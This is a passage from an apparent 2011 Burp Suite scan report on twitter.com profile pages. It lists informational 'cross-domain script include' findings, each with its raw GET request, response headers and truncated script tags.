X-Transaction: 1296266001-863-44101
ETag: "f38aec6749f0462266c3dd505da4c784"
Last-Modified: Sat, 29 Jan 2011 01:53:22 GMT
X-Runtime: 0.01378
Content-Type: text/html; charset=utf-8
Content-Length: 49671
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.334. http://twitter.com/John_W_Henry

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /John_W_Henry

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /John_W_Henry HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266003-90291-22061
ETag: "39b5637104095258c2612985611f2081"
Last-Modified: Sat, 29 Jan 2011 01:53:23 GMT
X-Runtime: 0.00864
Content-Type: text/html; charset=utf-8
Content-Length: 40419
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.335. http://twitter.com/KaseyRKahl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /KaseyRKahl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /KaseyRKahl HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265968-89789-38719
ETag: "91cc7fb3c644ed10961b8761bb947762"
Last-Modified: Sat, 29 Jan 2011 01:52:48 GMT
X-Runtime: 0.01025
Content-Type: text/html; charset=utf-8
Content-Length: 50928
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.336. http://twitter.com/KhloeKardashian

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /KhloeKardashian

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /KhloeKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266008-48453-14084
ETag: "a10b004421cd49a7bf1036242f788900"
Last-Modified: Sat, 29 Jan 2011 01:53:28 GMT
X-Runtime: 0.01326
Content-Type: text/html; charset=utf-8
Content-Length: 52081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.337. http://twitter.com/KimKardashian

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /KimKardashian

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /KimKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:58 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266038-98911-11256
ETag: "162e94dddb4eb4f4491a26acce7fb49a"
Last-Modified: Sat, 29 Jan 2011 01:53:58 GMT
X-Runtime: 0.37290
Content-Type: text/html; charset=utf-8
Content-Length: 49623
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiVodHRwOi8vdHdpdHRlci5jb20vS2ltS2FyZGFz%250AaGlhbjoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dd57a4fe4c4e017cb678d4f77a9a59706b7869bb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.338. http://twitter.com/Late_Show

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Late_Show

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Late_Show HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265286-91074-55312
ETag: "7b5d59ba88764ae8de6aa055d6a61048"
Last-Modified: Sat, 29 Jan 2011 01:41:26 GMT
X-Runtime: 0.00803
Content-Type: text/html; charset=utf-8
Content-Length: 39032
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.339. http://twitter.com/LibertyHotel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /LibertyHotel

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /LibertyHotel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-37638-22569
ETag: "6f06fb302d73fdde5809f33e541f4c86"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01451
Content-Type: text/html; charset=utf-8
Content-Length: 48481
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.340. http://twitter.com/Michael_Joseph

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234378-88897-28661
ETag: "3ef40dd0c0867a3d11767f65db46ddb3"
Last-Modified: Fri, 28 Jan 2011 17:06:18 GMT
X-Runtime: 0.01214
Content-Type: text/html; charset=utf-8
Content-Length: 51245
Pragma: no-cache
